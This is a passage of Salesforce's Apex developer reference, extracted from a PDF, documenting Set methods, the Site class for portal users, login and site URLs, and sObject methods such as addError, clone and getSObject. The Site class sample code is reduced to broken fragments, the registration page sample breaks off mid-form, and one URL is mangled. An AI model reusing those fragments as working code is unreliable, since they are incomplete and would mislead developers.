public Boolean remove(Object setElement)
Parameters
setElement
Type: Object
Return Value
Type: Boolean
1683
Reference
Set Class
removeAll(List<Object>)
Removes the elements in the specified list from the set if they are present.
Signature
public Boolean removeAll(List<Object> listOfElementsToRemove)
Parameters
listOfElementsToRemove
Type: List<Object>
Return Value
Type: Boolean
Returns true if the original set changed as a result of the call.
Usage
This method results in the relative complement of the two sets. The list must be of the same type as the set that calls the method.
Example
Set<integer> mySet =
new Set<integer>{1, 2, 3};
List<integer> myList =
new List<integer>{1, 3};
Boolean result =
mySet.removeAll(myList);
System.assertEquals(result, true);
Integer result2 = mySet.size();
System.assertEquals(result2, 1);
removeAll(Set<Object>)
Removes the elements in the specified set from the original set if they are present.
Signature
public Boolean removeAll(Set<Object> setOfElementsToRemove)
Parameters
setOfElementsToRemove
Type: Set<Object>
1684
Reference
Set Class
Return Value
Type: Boolean
This method returns true if the original set changed as a result of the call.
Usage
This method results in the relative complement of the two sets. The specified set must be of the same type as the original set that calls
the method.
retainAll(List<Object>)
Retains only the elements in this set that are contained in the specified list.
Signature
public Boolean retainAll(List<Object> listOfElementsToRetain)
Parameters
listOfElementsToRetain
Type: List<Object>
Return Value
Type: Boolean
This method returns true if the original set changed as a result of the call.
Usage
This method results in the intersection of the list and the set. The list must be of the same type as the set that calls the method.
Example
Set<integer> mySet =
new Set<integer>{1, 2, 3};
List<integer> myList =
new List<integer>{1, 3};
Boolean result =
mySet.retainAll(myList);
System.assertEquals(result, true);
retainAll(Set)
Retains only the elements in the original set that are contained in the specified set.
Signature
public Boolean retainAll(Set setOfElementsToRetain)
1685
Reference
Site Class
Parameters
setOfElementsToRetain
Type: Set
Return Value
Type: Boolean
Returns true if the original set changed as a result of the call.
Usage
This method results in the intersection of the two sets. The specified set must be of the same type as the original set that calls the method.
size()
Returns the number of elements in the set (its cardinality).
Signature
public Integer size()
Return Value
Type: Integer
Example
Set<integer> mySet =
new Set<integer>{1, 2, 3};
List<integer> myList =
new List<integer>{1, 3};
Boolean result =
mySet.retainAll(myList);
System.assertEquals(result, true);
Integer result2 = mySet.size();
System.assertEquals(result2, 2);
Site Class
Use the Site Class to manage your Force.com sites.
Namespace
System
1686
Reference
Site Class
Usage
If there is a exception when using site.createPortalUser, a null is returned and the site system administrator is sent an email.
For more information on sites, see Force.com Sites Overview in the Salesforce online help.
confirmPassword =
} }
{ communityNickname = \
} }
1687
Reference
Site Class
The following is the Visualforce registration page that uses the SiteRegisterController Apex controller above:
<apex:page id="Registration" showHeader="false" controller=
"SiteRegisterController" standardStylesheets="true">
<apex:outputText value="Registration"/>
<br/>
<apex:form id="theForm">
<apex:messages id="msg" styleClass="errorMsg" layout="table" style="margin-top:1em;"/>
<apex:panelGrid columns="2" style="margin-top:1em;">
<apex:outputLabel value="{!$Label.site.username}" for="username"/>
<apex:inputText required="true" id="username" value="{!username}"/>
<apex:outputLabel value="{!$Label.site.community_nickname}"
for="communityNickname"/>
<apex:inputText required="true" id="communityNickname" required="true"
value="{!communityNickname}"/>
<apex:outputLabel value="{!$Label.site.email}" for="email"/>
<apex:inputText required="true" id="email" required="true" value="{!email}"/>
<apex:outputLabel value="{!$Label.site.password}" for="password"/>
1688
Reference
Site Class
The sample code for the createPersonAccountPortalUser method is nearly identical to the sample code above, with the
following changes:
Replace all instances of PORTAL_ACCOUNT_ID with OWNER_ID.
Determine the ownerID instead of the accountID, and use the createPersonAccountPortalUser method instead of the
CreatePortalUser method by replacing the following code block:
String accountId = PORTAL_ACCOUNT_ID;
String userId = Site.createPortalUser(u, accountId, password);
with
String ownerId = OWNER_ID;
String userId = Site.createPersonAccountPortalUser(u, ownerId, password);
Site Methods
The following are methods for Site. All methods are static.
IN THIS SECTION:
changePassword(String, String, String)
Changes the password of the current user.
createPersonAccountPortalUser(sObject, String, String)
Creates a person account using the default record type defined on the guest user's profile, then enables it for the site's portal.
createPersonAccountPortalUser(sObject, String, String, String)
Creates a person account using the specified recordTypeID, then enables it for the site's portal.
createPortalUser(sObject, String, String, Boolean)
Creates a portal user for the given account and associates it with the site's portal.
forgotPassword(String)
Resets the user's password and sends an email to the user with their new password. Returns a value indicating whether the password
reset was successful or not.
getAdminEmail()
Returns the email address of the site administrator.
getAdminId()
Returns the user ID of the site administrator.
1689
Reference
Site Class
getAnalyticsTrackingCode()
The tracking code associated with your site. This code can be used by services like Google Analytics to track page request data for
your site.
getCurrentSiteUrl()
Deprecated. This method was replaced by getBaseUrl() in API version 30.0. Returns the base URL of the current site that
references and links should use.
getBaseCustomUrl()
Returns a base URL for the current site that doesnt use a Force.com subdomain. The returned URL uses the same protocol (HTTP or
HTTPS) as the current request if at least one non-Force.com custom URL that supports HTTPS exists on the site. The returned value
never ends with a / character. If all the custom URLs in this site end in Force.com or this site has no custom URLs, then this returns
an empty string. If the current request is not a site request, then this method returns an empty string. This method replaced
getCustomWebAddress and includes the custom URL's path prefix..
getBaseInsecureUrl()
Returns a base URL for the current site that uses HTTP instead of HTTPS. The current request's domain is used. The returned value
includes the path prefix and never ends with a / character. If the current request is not a site request, then this method returns an
empty string.
getBaseRequestUrl()
Returns the base URL of the current site for the requested URL. This isn't influenced by the referring page's URL. The returned URL
uses the same protocol (HTTP or HTTPS) as the current request. The returned value includes the path prefix and never ends with a
/ character. If the current request is not a site request, then this method returns an empty string.
getBaseSecureUrl()
Returns a base URL for the current site that uses HTTPS instead of HTTP. The current request's domain is preferred if it supports HTTPS.
Domains that are not Force.com subdomains are preferred over Force.com subdomains. A Force.com subdomain, if associated with
the site, is used if no other HTTPS domains exist in the current site. If no HTTPS custom URLs exist in the site, then this method returns
an empty string. The returned value includes the path prefix and never ends with a / character. If the current request is not a site
request, then this method returns an empty string.
getBaseUrl()
Returns the base URL of the current site that references and links should use. Note that this field may return the referring page's URL
instead of the current request's URL. The returned value includes the path prefix and never ends with a / character. If the current
request is not a site request, then this field returns an empty string. This field replaces getCurrentSiteUrl.
getCustomWebAddress()
Deprecated. This method was replaced by getBaseCustomUrl() in API version 30.0.
getDomain()
Returns the Force.com domain name for your organization.
getErrorDescription()
Returns the error description for the current page if its a designated error page for the site and an error exists; otherwise, returns an
empty string.
getErrorMessage()
Returns an error message for the current page if its a designated error page for the site and an error exists; otherwise, returns an
empty string.
getMasterLabel()
Returns the value of the Master Label field for the current site. If the current request is not a site request, then this field returns null.
getName()
Returns the API name of the current site.
1690
Reference
Site Class
getOriginalUrl()
Returns the original URL for this page if its a designated error page for the site; otherwise, returns null.
getPathPrefix()
Returns the URL path prefix of the current site or an empty string if none. For example, if the requested site URL is
http://myco.force.com/partners, then /partners is the path prefix. If the current request is not a site request,
then this method returns an empty string. This method replaced getPrefix in API version 30.0.
getPrefix()
Deprecated. This method was replaced by getPathPrefix() in API version 30.0.
getSiteId()
Returns the ID of the current site. If the current request is not a site request, then this field returns null.
getTemplate()
Returns the template name associated with the current site; returns the default template if no template has been designated.
getSiteType()
Returns the API value of the site type field for the current site. This can be Visualforce for a Force.com site, Siteforce for a Site.com
site, ChatterNetwork for a Force.com Communities site, or ChatterNetworkPicasso for a Site.com Communities site. If the current
request is not a site request, then this method returns null.
getSiteTypeLabel()
Returns the value of the Site Type field's label for the current site. If the current request is not a site request, then this method returns
null.
isLoginEnabled()
Returns true if the current site is associated with an active login-enabled portal; otherwise returns false.
isPasswordExpired()
For authenticated users, returns true if the currently logged-in user's password is expired. For non-authenticated users, returns
false.
isRegistrationEnabled()
Returns true if the current site is associated with an active self-registration-enabled Customer Portal; otherwise returns false.
login(String, String, String)
Allows users to log in to the current site with the given username and password, then takes them to the startUrl. If startUrl
is not a relative path, it defaults to the site's designated index page.
setPortalUserAsAuthProvider(sObject, String)
Sets the specified user information within the sites portal via an authentication provider.
Signature
public static System.PageReference changePassword(String newpassword, String
verifynewpassword, String opt_oldpassword)
1691
Reference
Site Class
Parameters
newpassword
Type: String
verifynewpassword
Type: String
opt_oldpassword
Type: String
Return Value
Type: System.PageReference
Usage
Calls to this method in API version 30.0 and later wont commit the transaction automatically. Calls to this method prior to API version
30.0 commit the transaction, making it impossible to roll back to a save point before the call.
Signature
public static ID createPersonAccountPortalUser(sObject user, String ownerId, String
password)
Parameters
user
Type: sObject
ownerId
Type: String
password
Type: String
Return Value
Type: ID
Usage
Calls to this method in API version 30.0 and later wont commit the transaction automatically. Calls to this method prior to API version
30.0 commit the transaction, making it impossible to roll back to a save point before the call.
Note: This method is only valid when a site is associated with a Customer Portal, and when the user license for the default new
user profile is a high-volume portal user.
1692
Reference
Site Class
Signature
public static ID createPersonAccountPortalUser(sObject user, String ownerId, String
recordTypeId, String password)
Parameters
user
Type: sObject
ownerId
Type: String
recordTypeId
Type: String
password
Type: String
Return Value
Type: ID
Usage
Calls to this method in API version 30.0 and later wont commit the transaction automatically. Calls to this method prior to API version
30.0 commit the transaction, making it impossible to roll back to a save point before the call.
Note: This method is only valid when a site is associated with a Customer Portal, and when the user license for the default new
user profile is a high-volume portal user.
Signature
public static ID createPortalUser(sObject user, String accountId, String opt_password,
Boolean opt_sendEmailConfirmation)
Parameters
user
Type: sObject
accountId
Type: String
opt_password
Type: String
1693
Reference
Site Class
(Optional) The password of the portal user. If not specified, or if set to null or an empty string, this method sends a new password
email to the portal user.
opt_sendEmailConfirmation
Type: Boolean
(Optional) Determines whether a new user email is sent to the portal user. Set it to true to send a new user email to the portal
user. The default is false, that is, the new user email isn't sent.
Return Value
Type: ID
Usage
The nickname field is required for the user sObject when using the createPortalUser method.
Note: This method is only valid when a site is associated with a Customer Portal.
Calls to this method in API version 30.0 and later wont commit the transaction automatically. Calls to this method prior to API version
30.0 commit the transaction, making it impossible to roll back to a save point before the call.
forgotPassword(String)
Resets the user's password and sends an email to the user with their new password. Returns a value indicating whether the password
reset was successful or not.
Signature
public static Boolean forgotPassword(String username)
Parameters
username
Type: String
Return Value
Type: Boolean
Note: The return value will always be true unless its called outside of a Visualforce page. If it's called outside of a Visualforce page,
it will be false.
Usage
Calls to this method in API version 30.0 and later wont commit the transaction automatically. Calls to this method prior to API version
30.0 commit the transaction, making it impossible to roll back to a save point before the call.
getAdminEmail()
Returns the email address of the site administrator.
1694
Reference
Site Class
Signature
public static String getAdminEmail()
Return Value
Type: String
getAdminId()
Returns the user ID of the site administrator.
Signature
public static ID getAdminId()
Return Value
Type: ID
getAnalyticsTrackingCode()
The tracking code associated with your site. This code can be used by services like Google Analytics to track page request data for your
site.
Signature
public static String getAnalyticsTrackingCode()
Return Value
Type: String
getCurrentSiteUrl()
Deprecated. This method was replaced by getBaseUrl() in API version 30.0. Returns the base URL of the current site that references
and links should use.
Note that this may return the referring page's URL instead of the current request's URL. The returned value includes the path prefix and
always ends with a / character. If the current request is not a site request, then this method returns null. If the current request is not
a site request, then this method returns null. This method was replaced by getBaseUrl in API version 30.0.
Signature
public static String getCurrentSiteUrl()
Return Value
Type: String
1695
Reference
Site Class
Usage
Use getBaseUrl() instead.
getBaseCustomUrl()
Returns a base URL for the current site that doesnt use a Force.com subdomain. The returned URL uses the same protocol (HTTP or
HTTPS) as the current request if at least one non-Force.com custom URL that supports HTTPS exists on the site. The returned value never
ends with a / character. If all the custom URLs in this site end in Force.com or this site has no custom URLs, then this returns an empty
string. If the current request is not a site request, then this method returns an empty string. This method replaced getCustomWebAddress
and includes the custom URL's path prefix..
Signature
public static String getBaseCustomUrl()
Return Value
Type: String
Usage
This method replaces getCustomWebAddress() and includes the custom URL's path prefix.
getBaseInsecureUrl()
Returns a base URL for the current site that uses HTTP instead of HTTPS. The current request's domain is used. The returned value includes
the path prefix and never ends with a / character. If the current request is not a site request, then this method returns an empty string.
Signature
public static String getBaseInsecureUrl()
Return Value
Type: String
getBaseRequestUrl()
Returns the base URL of the current site for the requested URL. This isn't influenced by the referring page's URL. The returned URL uses
the same protocol (HTTP or HTTPS) as the current request. The returned value includes the path prefix and never ends with a / character.
If the current request is not a site request, then this method returns an empty string.
Signature
public static String getBaseRequestUrl()
Return Value
Type: String
1696
Reference
Site Class
getBaseSecureUrl()
Returns a base URL for the current site that uses HTTPS instead of HTTP. The current request's domain is preferred if it supports HTTPS.
Domains that are not Force.com subdomains are preferred over Force.com subdomains. A Force.com subdomain, if associated with the
site, is used if no other HTTPS domains exist in the current site. If no HTTPS custom URLs exist in the site, then this method returns an
empty string. The returned value includes the path prefix and never ends with a / character. If the current request is not a site request,
then this method returns an empty string.
Signature
public static String getBaseSecureUrl()
Return Value
Type: String
getBaseUrl()
Returns the base URL of the current site that references and links should use. Note that this field may return the referring page's URL
instead of the current request's URL. The returned value includes the path prefix and never ends with a / character. If the current request
is not a site request, then this field returns an empty string. This field replaces getCurrentSiteUrl.
Signature
public static String getBaseUrl()
Return Value
Type: String
Usage
This method replaces getCurrentSiteUrl().
getCustomWebAddress()
Deprecated. This method was replaced by getBaseCustomUrl() in API version 30.0.
Returns the request's custom URL if it doesn't end in Force.com or returns the site's primary custom URL. If neither exist, then this returns
null. Note that the URL's path is always the root, even if the request's custom URL has a path prefix. If the current request is not a site
request, then this method returns null. The returned value always ends with a / character.
Signature
public static String getCustomWebAddress()
Return Value
Type: String
1697
Reference
Site Class
Usage
Use getBaseCustomUrl() instead.
getDomain()
Returns the Force.com domain name for your organization.
Signature
public static String getDomain()
Return Value
Type: String
getErrorDescription()
Returns the error description for the current page if its a designated error page for the site and an error exists; otherwise, returns an
empty string.
Signature
public static String getErrorDescription()
Return Value
Type: String
getErrorMessage()
Returns an error message for the current page if its a designated error page for the site and an error exists; otherwise, returns an empty
string.
Signature
public static String getErrorMessage()
Return Value
Type: String
getMasterLabel()
Returns the value of the Master Label field for the current site. If the current request is not a site request, then this field returns null.
Signature
public static String getMasterLabel()
1698
Reference
Site Class
Return Value
Type: String
getName()
Returns the API name of the current site.
Signature
public static String getName()
Return Value
Type: String
getOriginalUrl()
Returns the original URL for this page if its a designated error page for the site; otherwise, returns null.
Signature
public static String getOriginalUrl()
Return Value
Type: String
getPathPrefix()
Returns the URL path prefix of the current site or an empty string if none. For example, if the requested site URL is
http://myco.force.com/partners, then /partners is the path prefix. If the current request is not a site request, then
this method returns an empty string. This method replaced getPrefix in API version 30.0.
Signature
public static String getPathPrefix()
Return Value
Type: String
getPrefix()
Deprecated. This method was replaced by getPathPrefix() in API version 30.0.
Returns the URL path prefix of the current site. For example, if your site URL is myco.force.com/partners, /partners is
the path prefix. Returns null if the prefix isnt defined. If the current request is not a site request, then this method returns a null.
Signature
public static String getPrefix()
1699
Reference
Site Class
Return Value
Type: String
getSiteId()
Returns the ID of the current site. If the current request is not a site request, then this field returns null.
Signature
public static String getSiteId()
Return Value
Type: Id
getTemplate()
Returns the template name associated with the current site; returns the default template if no template has been designated.
Signature
public static System.PageReference getTemplate()
Return Value
Type: System.PageReference
getSiteType()
Returns the API value of the site type field for the current site. This can be Visualforce for a Force.com site, Siteforce for a Site.com site,
ChatterNetwork for a Force.com Communities site, or ChatterNetworkPicasso for a Site.com Communities site. If the current request is
not a site request, then this method returns null.
Signature
public static String getSiteType()
Return Value
Type: String
getSiteTypeLabel()
Returns the value of the Site Type field's label for the current site. If the current request is not a site request, then this method returns
null.
Signature
public static String getSyteTypeLabel()
1700
Reference
Site Class
Return Value
Type: String
isLoginEnabled()
Returns true if the current site is associated with an active login-enabled portal; otherwise returns false.
Signature
public static Boolean isLoginEnabled()
Return Value
Type: Boolean
isPasswordExpired()
For authenticated users, returns true if the currently logged-in user's password is expired. For non-authenticated users, returns false.
Signature
public static Boolean isPasswordExpired()
Return Value
Type: Boolean
isRegistrationEnabled()
Returns true if the current site is associated with an active self-registration-enabled Customer Portal; otherwise returns false.
Signature
public static Boolean isRegistrationEnabled()
Return Value
Type: Boolean
Signature
public static System.PageReference login(String username, String password, String
startUrl)
1701
Reference
sObject Class
Parameters
username
Type: String
password
Type: String
startUrl
Type: String
Return Value
Type: System.PageReference
Usage
All DML statements before the call to Site.login get committed. Its not possible to roll back to a save point that was created before
a call to Site.login.
Note: Do not include http:// or https:// in the startURL.
setPortalUserAsAuthProvider(sObject, String)
Sets the specified user information within the sites portal via an authentication provider.
Signature
public static Void setPortalUserAsAuthProvider(sObject user, String contactId)
Parameters
user
Type: sObject
contactId
Type: String
Return Value
Type: Void
Usage
This method is only valid when a site is associated with a Customer Portal.
Calls to this method in API version 30.0 and later wont commit the transaction automatically. Calls to this method prior to API version
30.0 commit the transaction, making it impossible to roll back to a save point before the call.
For more information on an authentication provider, see RegistrationHandler on page 509.
sObject Class
Contains methods for the sObject data type.
1702
Reference
sObject Class
Namespace
System
Usage
sObject methods are all instance methods, that is, they are called by and operate on a particular instance of an sObject, such as an
account or contact. The following are the instance methods for sObjects.
For more information on sObjects, see sObject Types on page 102.
SObject Methods
The following are methods for SObject. All are instance methods.
IN THIS SECTION:
addError(String)
Marks a record with a custom error message and prevents any DML operation from occurring.
addError(String, Boolean)
Marks a record with a custom error message, specifies whether or not the error message should be escaped, and prevents any DML
operation from occurring.
addError(Exception)
Marks a record with a custom error message and prevents any DML operation from occurring.
addError(Exception, Boolean)
Marks a record with a custom exception error message, specifies whether or not the exception error message should be escaped,
and prevents any DML operation from occurring.
field.addError(String)
Places the specified error message on the field in the Salesforce user interface and prevents any DML operation from occurring.
field.addError(String, Boolean)
Places the specified error message, which can be escaped or unescaped, on the field in the Salesforce user interface, and prevents
any DML operation from occurring.
clear()
Clears all field values
clone(Boolean, Boolean, Boolean, Boolean)
Creates a copy of the sObject record.
get(String)
Returns the value for the field specified by fieldName, such as AccountNumber.
get(Schema.sObjectField)
Returns the value for the field specified by the field token Schema.sObjectField, such as,
Schema.Account.AccountNumber.
getOptions()
Returns the database.DMLOptions object for the sObject.
getSObject(String)
Returns the value for the specified field. This method is primarily used with dynamic DML to access values for external IDs.
1703
Reference
sObject Class
getSObject(Schema.SObjectField)
Returns the value for the field specified by the field token Schema.fieldName, such as, Schema.MyObj.MyExternalId.
This method is primarily used with dynamic DML to access values for external IDs.
getSObjects(String)
Returns the values for the specified field. This method is primarily used with dynamic DML to access values for associated objects,
such as child relationships.
getSObjects(Schema.SObjectType)
Returns the value for the field specified by the field token Schema.fieldName, such as, Schema.Account.Contact.
This method is primarily used with dynamic DML to access values for associated objects, such as child relationships.
getSObjectType()
Returns the token for this sObject. This method is primarily used with describe information.
getQuickActionName()
Retrieves the name of a publisher action associated with this sObject. Typically used in triggers.
put(String, Object)
Sets the value for the specified field and returns the previous value for the field.
put(Schema.SObjectField, Object)
Sets the value for the field specified by the field token Schema.sObjectField, such as,
Schema.Account.AccountNumber and returns the previous value for the field.
putSObject(String, sObject)
Sets the value for the specified field. This method is primarily used with dynamic DML for setting external IDs. The method returns
the previous value of the field.
putSObject(Schema.sObjectType, sObject)
Sets the value for the field specified by the token Schema.sObjectType. This method is primarily used with dynamic DML for
setting external IDs. The method returns the previous value of the field.
setOptions(Database.DMLOptions)
Sets the DMLOptions object for the sObject.
addError(String)
Marks a record with a custom error message and prevents any DML operation from occurring.
Signature
public Void addError(String errorMsg)
Parameters
errorMsg
Type: String
The error message to mark the record with.
Return Value
Type: Void
1704
Reference
sObject Class
Usage
When used on Trigger.new in before insert and before update triggers, and on Trigger.old in before
delete triggers, the error message is displayed in the application interface.
See Triggers and Trigger Exceptions.
Note: This method escapes any HTML markup in the specified error message. The escaped characters are: \n, <, >, &, ", \,
\u2028, \u2029, and \u00a9. This results in the HTML markup not being rendered; instead it is displayed as text in the
Salesforce user interface.
When used in Visualforce controllers, the generated message is added to the collection of errors for the page. For more information, see
Validation Rules and Standard Controllers in the Visualforce Developer's Guide.
Example
Trigger.new[0].addError('bad');
addError(String, Boolean)
Marks a record with a custom error message, specifies whether or not the error message should be escaped, and prevents any DML
operation from occurring.
Signature
public Void addError(String errorMsg, Boolean escape)
Parameters
errorMsg
Type: String
The error message to mark the record with.
escape
Type: Boolean
Indicates whether any HTML markup in the custom error message should be escaped (true) or not (false).
Return Value
Type: Void
Usage
The escaped characters are: \n, <, >, &, ", \, \u2028, \u2029, and \u00a9. This results in the HTML markup not being rendered;
instead it is displayed as text in the Salesforce user interface.
Warning: Be cautious if you specify false for the escape argument. Unescaped strings displayed in the Salesforce user
interface can represent a vulnerability in the system because these strings might contain harmful code. If you want to include
HTML markup in the error message, call this method with a false escape argument and make sure you escape any dynamic
content, such as input field values. Otherwise, specify true for the escape argument or call addError(String
errorMsg) instead.
1705
Reference
sObject Class
Example
Trigger.new[0].addError('Fix & resubmit', false);
addError(Exception)
Marks a record with a custom error message and prevents any DML operation from occurring.
Signature
public Void addError(Exception exceptionError)
Parameters
exceptionError
Type: System.Exception
An Exception object or a custom exception object that contains the error message to mark the record with.
Return Value
Type: Void
Usage
When used on Trigger.new in before insert and before update triggers, and on Trigger.old in before
delete triggers, the error message is displayed in the application interface.
See Triggers and Trigger Exceptions.
Note: This method escapes any HTML markup in the specified error message. The escaped characters are: \n, <, >, &, ", \,
\u2028, \u2029, and \u00a9. This results in the HTML markup not being rendered; instead it is displayed as text in the
Salesforce user interface.
When used in Visualforce controllers, the generated message is added to the collection of errors for the page. For more information, see
Validation Rules and Standard Controllers in the Visualforce Developer's Guide.
Example
public class MyException extends Exception {}
Trigger.new[0].addError(new myException('Invalid Id'));
addError(Exception, Boolean)
Marks a record with a custom exception error message, specifies whether or not the exception error message should be escaped, and
prevents any DML operation from occurring.
Signature
public Void addError(Exception exceptionError, Boolean escape)
1706
Reference
sObject Class
Parameters
exceptionError
Type: System.Exception
An Exception object or a custom exception object that contains the error message to mark the record with.
escape
Type: Boolean
Indicates whether any HTML markup in the custom error message should be escaped (true) or not (false).
Return Value
Type: Void
Usage
The escaped characters are: \n, <, >, &, ", \, \u2028, \u2029, and \u00a9. This results in the HTML markup not being rendered;
instead it is displayed as text in the Salesforce user interface.
Warning: Be cautious if you specify false for the escape argument. Unescaped strings displayed in the Salesforce user
interface can represent a vulnerability in the system because these strings might contain harmful code. If you want to include
HTML markup in the error message, call this method with a false escape argument and make sure you escape any dynamic
content, such as input field values. Otherwise, specify true for the escape argument or call addError(Exception e)
instead.
Example
public class MyException extends Exception {}
Trigger.new[0].addError(new myException('Invalid Id & other issues', false));
field.addError(String)
Places the specified error message on the field in the Salesforce user interface and prevents any DML operation from occurring.
Signature
public Void addError(String errorMsg)
Parameters
errorMsg
Type: String
Return Value
Type: Void
Usage
Note:
1707
Reference
sObject Class
When used on Trigger.new in before insert and before update triggers, and on Trigger.old in before
delete triggers, the error appears in the application interface.
When used in Visualforce controllers, if there is an inputField component bound to field, the message is attached to the
component. For more information, see Validation Rules and Standard Controllers in the Visualforce Developer's Guide.
This method is highly specialized because the field identifier is not actually the invoking objectthe sObject record is the invoker.
The field is simply used to identify the field that should be used to display the error.
This method will likely change in future versions of Apex.
See Triggers and Trigger Exceptions.
Note: This method escapes any HTML markup in the specified error message. The escaped characters are: \n, <, >, &, ", \,
\u2028, \u2029, and \u00a9. This results in the HTML markup not being rendered; instead it is displayed as text in the
Salesforce user interface.
Example
Trigger.new[0].myField__c.addError('bad');
field.addError(String, Boolean)
Places the specified error message, which can be escaped or unescaped, on the field in the Salesforce user interface, and prevents any
DML operation from occurring.
Signature
public Void addError(String errorMsg, Boolean escape)
Parameters
errorMsg
Type: String
The error message to mark the record with.
escape
Type: Boolean
Indicates whether any HTML markup in the custom error message should be escaped (true) or not (false).
Return Value
Type:
Usage
The escaped characters are: \n, <, >, &, ", \, \u2028, \u2029, and \u00a9. This results in the HTML markup not being rendered;
instead it is displayed as text in the Salesforce user interface.
Warning: Be cautious if you specify false for the escape argument. Unescaped strings displayed in the Salesforce user
interface can represent a vulnerability in the system because these strings might contain harmful code. If you want to include
HTML markup in the error message, call this method with a false escape argument and make sure you escape any dynamic
1708
Reference
sObject Class
content, such as input field values. Otherwise, specify true for the escape argument or call field.addError(String
errorMsg) instead.
Example
Trigger.new[0].myField__c.addError('Fix & resubmit', false);
clear()
Clears all field values
Signature
public Void clear()
Return Value
Type: Void
Example
Account acc = new account(Name = 'Acme');
acc.clear();
Account expected = new Account();
system.assertEquals(expected, acc);
Signature
public sObject clone(Boolean opt_preserve_id, Boolean opt_IsDeepClone, Boolean
opt_preserve_readonly_timestamps, Boolean opt_preserve_autonumber)
Parameters
opt_preserve_id
Type: Boolean
(Optional) Determines whether the ID of the original object is preserved or cleared in the duplicate. If set to true, the ID is copied
to the duplicate. The default is false, that is, the ID is cleared.
opt_IsDeepClone
Type: Boolean
(Optional) Determines whether the method creates a full copy of the sObject field, or just a reference:
If set to true, the method creates a full copy of the sObject. All fields on the sObject are duplicated in memory, including
relationship fields. Consequently, if you make changes to a field on the cloned sObject, the original sObject is not affected.
1709
Reference
sObject Class
If set to false, the method performs a shallow copy of the sObject fields. All copied relationship fields reference the original
sObjects. Consequently, if you make changes to a relationship field on the cloned sObject, the corresponding field on the original
sObject is also affected, and vice-versa. The default is false.
opt_preserve_readonly_timestamps
Type: Boolean
(Optional) Determines whether the read-only timestamp fields are preserved or cleared in the duplicate. If set to true, the read-only
fields CreatedById, CreatedDate, LastModifiedById, and LastModifiedDate are copied to the duplicate.
The default is false, that is, the values are cleared.
opt_preserve_autonumber
Type: Boolean
(Optional) Determines whether auto number fields of the original object are preserved or cleared in the duplicate. If set to true,
auto number fields are copied to the cloned object. The default is false, that is, auto number fields are cleared.
Return Value
Type: sObject (of same type)
Usage
Note: For Apex saved using SalesforceAPI version 22.0 or earlier, the default value for the opt_preserve_id argument is
true, that is, the ID is preserved.
Example
Account acc = new account(Name = 'Acme', Description = 'Acme Account');
Account clonedAcc = acc.clone(false, false, false, false);
System.assertEquals(acc, clonedAcc);
get(String)
Returns the value for the field specified by fieldName, such as AccountNumber.
Signature
public Object get(String fieldName)
Parameters
fieldName
Type: String
Return Value
Type: Object
Usage
For more information, see Dynamic SOQL.
1710
Reference
sObject Class
Example
Account acc = new account(Name = 'Acme', Description = 'Acme Account');
String description = (String)acc.get('Description');
System.assertEquals('Acme Account', description);
get(Schema.sObjectField)
Returns the value for the field specified by the field token Schema.sObjectField, such as,
Schema.Account.AccountNumber.
Signature
public Object get(Schema.sObjectField field)
Parameters
field
Type: Schema.SObjectField
Return Value
Type: Object
Usage
For more information, see Dynamic SOQL.
Example
Account acc = new account(Name = 'Acme', Description = 'Acme Account');
String description = (String)acc.get(Schema.Account.Description);
System.assertEquals('Acme Account', description);
getOptions()
Returns the database.DMLOptions object for the sObject.
Signature
public Database.DMLOptions getOptions()
Return Value
Type: Database.DMLOptions
Example
Database.DMLOptions dmo = new Database.dmlOptions();
dmo.assignmentRuleHeader.useDefaultRule = true;
1711
Reference
sObject Class
getSObject(String)
Returns the value for the specified field. This method is primarily used with dynamic DML to access values for external IDs.
Signature
public sObject getSObject(String fieldName)
Parameters
fieldName
Type: String
Return Value
Type: sObject
Example
Account acc = new account(Name = 'Acme', Description = 'Acme Account');
insert acc;
Contact con = new Contact(Lastname = 'AcmeCon', AccountId = acc.id);
insert con;
SObject contactDB =
[SELECT Id, AccountId, Account.Name FROM Contact WHERE id = :con.id LIMIT 1];
Account a = (Account)contactDB.getSObject('Account');
System.assertEquals('Acme', a.name);
getSObject(Schema.SObjectField)
Returns the value for the field specified by the field token Schema.fieldName, such as, Schema.MyObj.MyExternalId.
This method is primarily used with dynamic DML to access values for external IDs.
Signature
public sObject getSObject(Schema.SObjectField fieldName)
Parameters
fieldName
Type: Schema.SObjectField
Return Value
Type: sObject
1712
Reference
sObject Class
Example
Account acc = new account(name = 'Acme', description = 'Acme Account');
insert acc;
Contact con = new contact(lastname = 'AcmeCon', accountid = acc.id);
insert con;
Schema.DescribeFieldResult fieldResult = Contact.AccountId.getDescribe();
Schema.SObjectfield field = fieldResult.getSobjectField();
SObject contactDB =
[SELECT Id, AccountId, Account.Name FROM Contact WHERE id = :con.id LIMIT 1];
Account a = (Account)contactDB.getSObject(field);
System.assertEquals('Acme', a.name);
getSObjects(String)
Returns the values for the specified field. This method is primarily used with dynamic DML to access values for associated objects, such
as child relationships.
Signature
public sObject[] getSObjects(String fieldName)
Parameters
fieldName
Type: String
Return Value
Type: sObject[]
Usage
For more information, see Dynamic DML.
Example
Account acc = new account(name = 'Acme', description = 'Acme Account');
insert acc;
Contact con = new contact(lastname = 'AcmeCon', accountid = acc.id);
insert con;
SObject[] a = [SELECT id, (SELECT Name FROM Contacts LIMIT 1) FROM Account WHERE id =
:acc.id];
SObject[] contactsDB = a.get(0).getSObjects('Contacts');
String fieldValue = (String)contactsDB.get(0).get('Name');
System.assertEquals('AcmeCon', fieldValue);
1713
Reference
sObject Class
getSObjects(Schema.SObjectType)
Returns the value for the field specified by the field token Schema.fieldName, such as, Schema.Account.Contact. This
method is primarily used with dynamic DML to access values for associated objects, such as child relationships.
Signature
public sObject[] getSObjects(Schema.SObjectType fieldName)
Parameters
fieldName
Type: Schema.SObjectType
Return Value
Type: sObject[]
getSObjectType()
Returns the token for this sObject. This method is primarily used with describe information.
Signature
public Schema.SObjectType getSObjectType()
Return Value
Type: Schema.SObjectType
Usage
For more information, see Understanding Apex Describe Information.
Example
Account acc = new Account(name = 'Acme', description = 'Acme Account');
Schema.sObjectType expected = Schema.Account.getSObjectType();
System.assertEquals(expected, acc.getSobjectType());
getQuickActionName()
Retrieves the name of a publisher action associated with this sObject. Typically used in triggers.
Signature
public String getQuickActionName()
Return Value
Type: String
1714
Reference
sObject Class
Example
trigger accTrig2 on Contact (before insert) {
for (Contact c : Trigger.new) {
if (c.getQuickActionName() == QuickAction.CreateContact) {
c.WhereFrom__c = 'GlobaActionl';
} else if (c.getQuickActionName() == Schema.Account.QuickAction.CreateContact) {
c.WhereFrom__c = 'AccountAction';
} else if (c.getQuickActionName() == null) {
